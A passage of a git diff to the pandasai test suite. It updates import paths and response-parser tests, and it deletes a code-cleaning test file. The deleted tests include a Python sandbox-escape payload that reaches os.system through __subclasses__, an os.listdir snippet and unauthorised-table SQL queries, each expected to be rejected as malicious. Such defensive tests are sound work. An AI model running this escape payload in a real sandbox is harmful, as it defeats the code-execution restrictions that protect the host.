- with pytest.raises(ValueError, match="Unsupported cache format: unsupported"):
- loader._read_cache("dummy_path")
+ with pytest.raises(ValueError, match="Unsupported file format: unsupported"):
+ loader._read_csv_or_parquet("dummy_path", "unsupported")
def test_apply_transformations(self, sample_schema):
loader = DatasetLoader()
@@ -226,6 +226,3 @@ def test_cache_data(self, sample_schema):
with pytest.raises(ValueError, match="Unsupported cache format: unsupported"):
loader._cache_data(df, "dummy_path")
-
-
-# Add more tests for _load_from_source and other methods as needed
diff --git a/tests/unit_tests/helpers/test_optional_dependency.py b/tests/unit_tests/helpers/test_optional_dependency.py
index e06008ed7..6360fc662 100644
--- a/tests/unit_tests/helpers/test_optional_dependency.py
+++ b/tests/unit_tests/helpers/test_optional_dependency.py
@@ -8,10 +8,16 @@
import pytest
-from pandasai.helpers.optional import VERSIONS, get_environment, import_dependency
-from pandasai.safe_libs.restricted_matplotlib import RestrictedMatplotlib
-from pandasai.safe_libs.restricted_numpy import RestrictedNumpy
-from pandasai.safe_libs.restricted_pandas import RestrictedPandas
+from pandasai.core.code_execution.environment import (
+ VERSIONS,
+ get_environment,
+ import_dependency,
+)
+from pandasai.core.code_execution.safe_libs.restricted_matplotlib import (
+ RestrictedMatplotlib,
+)
+from pandasai.core.code_execution.safe_libs.restricted_numpy import RestrictedNumpy
+from pandasai.core.code_execution.safe_libs.restricted_pandas import RestrictedPandas
def test_import_optional():
diff --git a/tests/unit_tests/helpers/test_responses.py b/tests/unit_tests/helpers/test_responses.py
index 3c927a8ea..bf4337421 100644
--- a/tests/unit_tests/helpers/test_responses.py
+++ b/tests/unit_tests/helpers/test_responses.py
@@ -1,59 +1,82 @@
import unittest
+from pandasai.exceptions import InvalidOutputValueMismatch
+from pandasai.core.response.base import ResponseParser
+from pandasai.core.response.response_types import Chart, DataFrame, Number, String
+import pandas as pd
-from PIL import Image
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.responses.context import Context
-from pandasai.responses.response_parser import ResponseParser
-from pandasai.schemas.df_config import Config
-
-
-class TestFormatPlot(unittest.TestCase):
+class TestResponseParser(unittest.TestCase):
@classmethod
def setUpClass(cls):
- llm = FakeLLM(output=None)
- config = {"llm": llm, "enable_cache": True}
- config = Config(**config)
- context = Context(config=config, logger=Logger())
- cls.response_parser = ResponseParser(context)
+ cls.response_parser = ResponseParser()
- def test_display_plot_from_file(self):
- result = {"type": "plot", "value": "path/to/plot.png"}
- with unittest.mock.patch(
- "builtins.open", unittest.mock.mock_open(read_data=b"")
- ):
- with unittest.mock.patch(
- "PIL.Image.open", return_value=Image.new("RGB", (100, 100))
- ):
- with unittest.mock.patch("PIL.Image.Image.show") as mock_show:
- self.assertEqual(
- self.response_parser.format_plot(result), "path/to/plot.png"
- )
- mock_show.assert_called_once()
-
- def test_display_plot_from_bytes(self):
- result = {"type": "plot", "value": b"data:image/png;base64 fake_image_data"}
- with unittest.mock.patch(
- "PIL.Image.open", return_value=Image.new("RGB", (100, 100))
- ):
- with unittest.mock.patch("PIL.Image.Image.show"):
- self.assertEqual(
- self.response_parser.format_plot(result),
- b"data:image/png;base64 fake_image_data",
- )
-
- def test_return_value_without_display(self):
+ def test_parse_valid_number(self):
+ result = {"type": "number", "value": 42}
+ response = self.response_parser.parse(result)
+ self.assertIsInstance(response, Number)
+
+ def test_parse_valid_string(self):
+ result = {"type": "string", "value": "test string"}
+ response = self.response_parser.parse(result)
+ self.assertIsInstance(response, String)
+
+ def test_parse_valid_dataframe(self):
+ result = {
+ "type": "dataframe",
+ "value": pd.DataFrame({"col1": [1, 2, 3], "col2": [4, 5, 6]}),
+ }
+
+ response = self.response_parser.parse(result)
+ self.assertIsInstance(response, DataFrame)
+
+ def test_parse_valid_plot(self):
result = {"type": "plot", "value": "path/to/plot.png"}
- with unittest.mock.patch(
- "builtins.open", unittest.mock.mock_open(read_data=b"")
- ):
- with unittest.mock.patch(
- "PIL.Image.open", return_value=Image.new("RGB", (100, 100))
- ):
- with unittest.mock.patch.object(
- self.response_parser._context.config, "open_charts", False
- ):
- self.assertEqual(
- self.response_parser.format_plot(result), "path/to/plot.png"
- )
+ response = self.response_parser.parse(result)
+ self.assertIsInstance(response, Chart)
+
+ def test_parse_invalid_type(self):
+ result = {"type": "unknown", "value": "test"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser.parse(result)
+
+ def test_parse_missing_type(self):
+ result = {"value": "test"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser.parse(result)
+
+ def test_parse_missing_value(self):
+ result = {"type": "string"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser.parse(result)
+
+ def test_validate_invalid_number_type(self):
+ result = {"type": "number", "value": "not a number"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser._validate_response(result)
+
+ def test_validate_invalid_string_type(self):
+ result = {"type": "string", "value": 123}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser._validate_response(result)
+
+ def test_validate_invalid_dataframe_type(self):
+ result = {"type": "dataframe", "value": "not a dataframe"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser._validate_response(result)
+
+ def test_validate_invalid_plot_type(self):
+ result = {"type": "plot", "value": 12345}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser._validate_response(result)
+
+ def test_validate_plot_with_base64(self):
+ result = {"type": "plot", "value": "data:image/png;base64 fake_image_data"}
+ self.assertTrue(self.response_parser._validate_response(result))
+
+ def test_validate_valid_plot_path(self):
+ result = {"type": "plot", "value": "/valid/path/to/plot.png"}
+ self.assertTrue(self.response_parser._validate_response(result))
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/llms/test_bamboo_llm.py b/tests/unit_tests/llms/test_bamboo_llm.py
index 2b9b1c870..6feff2b9f 100644
--- a/tests/unit_tests/llms/test_bamboo_llm.py
+++ b/tests/unit_tests/llms/test_bamboo_llm.py
@@ -3,7 +3,7 @@
from pandasai.exceptions import PandasAIApiCallError
from pandasai.llm.bamboo_llm import BambooLLM
-from pandasai.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class MockHttpResponse:
@@ -11,7 +11,7 @@ def __init__(self, status_code):
self.status_code = status_code
def json(self):
- return {"data": "Hello World", "message": "test"}
+ return {"answer": "Hello World", "message": "test"}
class TestBambooLLM(unittest.TestCase):
@@ -39,11 +39,10 @@ def test_call_method(self, mock_request):
call_args = mock_request.call_args_list[0][0]
mock_request.assert_called_once()
assert call_args[1] == "POST"
- assert call_args[2] == "/llm/chat"
+ assert call_args[2] == "/query"
assert mock_request.call_args_list[0][1] == {
"json": {
- "code": ["print('Hello')", "for i in range(10): print(i)"],
- "query": ["What is Chroma?", "How does it work?"],
+ "prompt": "instruction",
}
}
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
deleted file mode 100644
index e7520b19e..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ /dev/null
@@ -1,917 +0,0 @@
-"""Unit tests for the CodeCleaning class"""
-
-import ast
-import uuid
-from typing import Optional
-from unittest.mock import MagicMock, patch
-
-import pytest
-
-from pandasai import Agent
-from pandasai.dataframe.base import DataFrame
-from pandasai.exceptions import (
- BadImportError,
- InvalidConfigError,
- MaliciousQueryError,
-)
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.code_cleaning import CodeCleaning, CodeExecutionContext
-from pandasai.pipelines.logic_unit_output import LogicUnitOutput
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.schemas.df_config import Config
-
-
-class MockDataframe:
- table_name = "allowed_table"
-
- def __init__(self, table_name="test"):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return self.name
-
-
-class TestCodeCleaning:
- """Unit tests for the CodeCleaning class"""
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def logger(self):
- return Logger()
-
- @pytest.fixture
- def config_with_direct_sql(self):
- return Config(
- llm=FakeLLM(output=""),
- enable_cache=False,
- direct_sql=True,
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def agent(self, llm, sample_df):
- return Agent([sample_df], config={"llm": llm, "enable_cache": False})
-
- @pytest.fixture
- def agent_with_connector(self, llm, pgsql_connector: DataFrame):
- return Agent(
- [pgsql_connector],
- config={"llm": llm, "enable_cache": False, "direct_sql": True},
- )
-
- @pytest.fixture
- def code_cleaning(self, agent: Agent):
- return CodeCleaning()
-
- @pytest.fixture
- def exec_context(self) -> MagicMock:
- return CodeExecutionContext(uuid.uuid4())
-
- @pytest.fixture
- @patch("extensions.connectors.sql.pandasai_sql", autospec=True)
- def sql_connector(self, create_engine):
- return DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- @pytest.fixture
- @patch("extensions.connectors.sql.pandasai_sql", autospec=True)
- def pgsql_connector(self, create_engine):
- return DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- def test_run_code_for_calculations(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- code = """result = {'type': 'number', 'value': 1 + 1}"""
- output = code_cleaning.execute(code, context=context, logger=logger)
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_run_code_invalid_code(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- with pytest.raises(Exception):
- code_cleaning.execute("1 +", context=context, logger=logger)
-
- def test_clean_code_raise_not_whitelisted_lib(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- builtins_code = """import scipy
-result = {'type': 'number', 'value': set([1, 2, 3])}"""
-
- with pytest.raises(BadImportError):
- code_cleaning.execute(builtins_code, context=context, logger=logger)
-
- def test_clean_code_removes_jailbreak_code(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """__builtins__['str'].__class__.__mro__[-1].__subclasses__()[140].__init__.__globals__['system']('ls')
-print('hello world')"""
-
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_remove_environment_defaults(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- pandas_code = """import pandas as pd
-print('hello world')
-"""
- output = code_cleaning.execute(pandas_code, context=context, logger=logger)
-
- assert output.output == """print('hello world')"""
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_whitelist_import(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that an installed whitelisted library is added to the environment."""
- safe_code = """
-import numpy as np
-np.array()
-"""
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
-
- assert output.output == """np.array()"""
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_raise_bad_import_error(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-import os
-print(os.listdir())
-"""
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_accesses_node_id(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that value.func.value.id is accessed safely in _check_is_df_declaration."""
- pandas_code = """unique_countries = dfs[0]['country'].unique()
-smallest_countries = df.sort_values(by='area').head()"""
- output = code_cleaning.execute(pandas_code, context=context, logger=logger)
-
- assert output.output == pandas_code
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_remove_dfs_overwrites(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- hallucinated_code = """dfs = [pd.DataFrame([1,2,3])]
-print(dfs)"""
- output = code_cleaning.execute(
- hallucinated_code, context=context, logger=logger
- )
-
- assert output.output == """print(dfs)"""
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_custom_whitelisted_dependencies(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- code = """
-import my_custom_library
-my_custom_library.do_something()
-"""
-
- with pytest.raises(BadImportError):
- code_cleaning.execute(code, context=context, logger=logger)
-
- code_cleaning._config.custom_whitelisted_dependencies = ["my_custom_library"]
- output = code_cleaning.execute(code, context=context, logger=logger)
-
- print(code_cleaning._additional_dependencies)
- assert output.output == "my_custom_library.do_something()"
- assert (
- code_cleaning._additional_dependencies[0]["module"] == "my_custom_library"
- )
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_validate_true_direct_sql_with_two_different_connector(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- sql_connector,
- pgsql_connector,
- ):
- # not exception is raised using single connector
- # raise exception when two different connector
- with pytest.raises(InvalidConfigError):
- context.config.direct_sql = True
- context.dfs = [sql_connector, pgsql_connector]
- code_cleaning.execute(
- "np.array()\nexecute_sql_query()", context=context, logger=logger
- )
-
- def test_clean_code_direct_sql_code(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- agent_with_connector: Agent,
- sql_connector,
- pgsql_connector,
- ):
- """Test that the direct SQL function definition is removed when 'direct_sql' is True"""
- safe_code = """
-import numpy as np
-def execute_sql_query(sql_query: str) -> pd.DataFrame:
- # code to connect to the database and execute the query
- # ...
- # return the result as a dataframe
- return pd.DataFrame()
-np.array()
-execute_sql_query()
-"""
- context.config.direct_sql = True
- context.dfs = [pgsql_connector, pgsql_connector]
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
-
- assert output.output == "np.array()\nexecute_sql_query()"
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_direct_sql_code_false(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that the direct SQL function definition is removed when 'direct_sql' is False"""
- safe_code = """
-import numpy as np
-def execute_sql_query(sql_query: str) -> pd.DataFrame:
- # code to connect to the database and execute the query
- # ...
- # return the result as a dataframe
- return pd.DataFrame()
-np.array()
-"""
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
- assert (
- output.output
- == """def execute_sql_query(sql_query: str) ->pd.DataFrame:
- return pd.DataFrame()
-
-
-np.array()"""
- )
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_check_is_query_using_relevant_table_invalid_query(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse("sql_query = 'SELECT * FROM your_table'").body[0]
-
- code_cleaning._dfs = [MockDataframe("allowed_table")]
-
- with pytest.raises(MaliciousQueryError):
- code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- def test_check_is_query_using_relevant_table_valid_query(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse("sql_query = 'SELECT * FROM allowed_table'").body[0]
-
- code_cleaning._dfs = [MockDataframe("allowed_table")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert node.value.value == "SELECT * FROM allowed_table"
-
- def test_check_is_query_using_relevant_table_multiple_tables(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- "sql_query = 'SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id'"
- ).body[0]
-
- code_cleaning._dfs = [MockDataframe("table1"), MockDataframe("table2")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == "SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id"
- )
-
- def test_check_is_query_using_relevant_table_multiple_tables_using_alias_with_quote(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- "sql_query = 'SELECT table1.id AS id, table1.author_id, table2.hidden AS is_hidden, table3.text AS comment_text FROM table1 LEFT JOIN table2 ON table1.id = table2.feed_message_id LEFT JOIN table3 ON table1.id = table3.feed_message_id'"
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [
- MockObject("table1"),
- MockObject("table2"),
- MockObject("table3"),
- ]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == 'SELECT "table1".id AS id, "table1".author_id, "table2".hidden AS is_hidden, "table3".text AS comment_text FROM "table1" LEFT JOIN "table2" ON "table1".id = "table2".feed_message_id LEFT JOIN "table3" ON "table1".id = "table3".feed_message_id'
- )
-
- def test_check_relevant_table_multiple_tables_passing_directly_to_function(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- "execute_sql_query('SELECT table1.id AS id, table1.author_id, table2.hidden AS is_hidden, table3.text AS comment_text FROM table1 LEFT JOIN table2 ON table1.id = table2.feed_message_id LEFT JOIN table3 ON table1.id = table3.feed_message_id')"
- ).body[0]
-
- code_cleaning._dfs = [
- MockDataframe("table1"),
- MockDataframe("table2"),
- MockDataframe("table3"),
- ]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Expr)
- assert (
- node.value.args[0].value
- == "SELECT table1.id AS id, table1.author_id, table2.hidden AS is_hidden, table3.text AS comment_text FROM table1 LEFT JOIN table2 ON table1.id = table2.feed_message_id LEFT JOIN table3 ON table1.id = table3.feed_message_id"
- )
-
- def test_check_is_query_using_relevant_table_unknown_table(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse("sql_query = 'SELECT * FROM unknown_table'").body[0]
-
- code_cleaning._dfs = [MockDataframe()]
-
- with pytest.raises(MaliciousQueryError):
- code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- def test_check_is_query_using_relevant_table_multiple_tables_one_unknown(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- "sql_query = 'SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id'"
- ).body[0]
-
- code_cleaning._dfs = [MockDataframe("table1"), MockDataframe("unknown_table")]
-
- with pytest.raises(MaliciousQueryError):
- code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- def test_clean_code_using_correct_sql_table(
- self,
- pgsql_connector: DataFrame,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that the correct sql table"""
- code_cleaning = CodeCleaning()
-
- context.dfs = [pgsql_connector]
- safe_code = (
- """sql_query = 'SELECT * FROM your_table'\nexecute_sql_query(sql_query)"""
- )
- context.config.direct_sql = True
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
- assert (
- output.output
- == "sql_query = 'SELECT * FROM \"your_table\"'\nexecute_sql_query(sql_query)"
- )
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_with_no_execute_sql_query_usage_script(
- self,
- pgsql_connector: DataFrame,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that the correct sql table"""
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pgsql_connector]
- safe_code = (
- """orders_count = execute_sql_query('SELECT COUNT(*) FROM orders')[0][0]"""
- )
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
- assert output.output == safe_code
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_using_incorrect_sql_table(
- self,
- pgsql_connector: DataFrame,
- context: PipelineContext,
- logger,
- ):
- """Test that the direct SQL function definition is removed when 'direct_sql' is False"""
- code_cleaning = CodeCleaning()
- context.dfs = [pgsql_connector]
- context.config.direct_sql = True
- safe_code = """sql_query = 'SELECT * FROM unknown_table'
- """
- with pytest.raises(MaliciousQueryError) as excinfo:
- code_cleaning.execute(safe_code, context=context, logger=logger)
-
- assert str(excinfo.value) == ("Query uses unauthorized table: unknown_table.")
-
- def test_clean_code_using_multi_incorrect_sql_table(
- self,
- pgsql_connector: DataFrame,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that the direct SQL function definition is removed when 'direct_sql' is False"""
- code_cleaning = CodeCleaning()
- context.dfs = [pgsql_connector]
- context.config.direct_sql = True
- safe_code = """sql_query = 'SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id'"""
- with pytest.raises(MaliciousQueryError) as excinfo:
- code_cleaning.execute(safe_code, context=context, logger=logger)
-
- assert str(excinfo.value) == ("Query uses unauthorized table: table1.")
-
- def test_fix_dataframe_redeclarations(
- self, mock_head, context: PipelineContext, config: dict
- ):
- pandas_connector = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-df1 = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})
-"""
- tree = ast.parse(python_code)
-
- clean_code = ["df1 = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})"]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[0], clean_code
- )
-
- assert isinstance(output, ast.Assign)
-
- def test_fix_dataframe_multiline_redeclarations(
- self, mock_head, context: PipelineContext, config: dict
- ):
- pandas_connector = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-import pandas as pd
-
-df1 = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})
-
-print(df1)
-"""
- tree = ast.parse(python_code)
- clean_codes = [
- "df1 = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})",
- ]
-
- outputs = [
- code_cleaning._extract_fix_dataframe_redeclarations(node, clean_codes)
- for node in tree.body
- ]
-
- assert outputs[0] is None
- assert outputs[1] is not None
- assert isinstance(outputs[1], ast.Assign)
- assert outputs[2] is None
-
- def test_fix_dataframe_no_redeclarations(self, mock_head, context: PipelineContext):
- pandas_connector = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- context.dfs = [pandas_connector]
-
- python_code = """
-df1 = dfs[0]
-"""
- tree = ast.parse(python_code)
-
- code_list = ["df1 = dfs[0]"]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[0], code_list
- )
-
- assert output is None
-
- def test_fix_dataframe_redeclarations_with_subscript(
- self, mock_head, context: PipelineContext, config: dict
- ):
- pandas_connector = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-dfs[0] = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})
-"""
- tree = ast.parse(python_code)
-
- code_list = ["dfs[0] = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})"]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[0], code_list
- )
-
- assert isinstance(output, ast.Assign)
-
- def test_fix_dataframe_redeclarations_with_subscript_and_data_variable(
- self, mock_head, context: PipelineContext, config: dict
- ):
- data = {
- "country": ["China", "United States", "Japan", "Germany", "United Kingdom"],
- "sales": [8000, 6000, 4000, 3500, 3000],
- }
- pandas_connector = DataFrame(data)
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-data = {'country': ['China', 'United States', 'Japan', 'Germany', 'United Kingdom'],
- 'sales': [8000, 6000, 4000, 3500, 3000]}
-dfs[0] = pd.DataFrame(data)
-"""
- tree = ast.parse(python_code)
-
- code_list = [
- "data = {'country': ['China', 'United States', 'Japan', 'Germany', 'United Kingdom'],'sales': [8000, 6000, 4000, 3500, 3000]}",
- "dfs[0] = pd.DataFrame(data)",
- ]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[1], code_list
- )
-
- assert isinstance(output, ast.Assign)
-
- def test_fix_dataframe_redeclarations_and_data_variable(
- self, mock_head, context: PipelineContext, config: Config
- ):
- data = {
- "country": ["China", "United States", "Japan", "Germany", "United Kingdom"],
- "sales": [8000, 6000, 4000, 3500, 3000],
- }
- pandas_connector = DataFrame(data)
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-data = {'country': ['China', 'United States', 'Japan', 'Germany', 'United Kingdom'],
- 'sales': [8000, 6000, 4000, 3500, 3000]}
-df = pd.DataFrame(data)
-"""
- tree = ast.parse(python_code)
-
- code_list = [
- "data = {'country': ['China', 'United States', 'Japan', 'Germany', 'United Kingdom'],'sales': [8000, 6000, 4000, 3500, 3000]}",
- "df = pd.DataFrame(data)",
- ]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[1], code_list
- )
-
- assert isinstance(output, ast.Assign)
-
- def test_check_is_query_using_quote_with_table_name(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse("""sql_query = 'SELECT * FROM "allowed_table"'""").body[0]
-
- code_cleaning._dfs = [MockDataframe("allowed_table")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert node.value.value == 'SELECT * FROM "allowed_table"'
-
- def test_check_is_query_not_extract_created_at(self, code_cleaning: CodeCleaning):
- mock_node = ast.parse(
- """sql_query = 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM "Users" GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'"""
- ).body[0]
-
- code_cleaning._dfs = [MockDataframe("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM "Users" GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'
- )
-
- def test_check_is_query_not_extract_without_quote_created_at(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- """sql_query = 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM Users GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'"""
- ).body[0]
-
- code_cleaning._dfs = [MockDataframe("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM Users GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'
- )
-
- def test_check_is_query_not_extract_postgres_without_quote_created_at(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- """sql_query = 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM Users GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'"""
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [MockObject("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM "Users" GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'
- )
-
- def test_check_query_with_semicolon(self, code_cleaning: CodeCleaning):
- mock_node = ast.parse(
- """sql_query = 'SELECT COUNT(*) AS user_count FROM Users;'"""
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [MockObject("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert node.value.value == 'SELECT COUNT(*) AS user_count FROM "Users"'
-
- def test_check_query_with_semicolon_execute_sql_func(
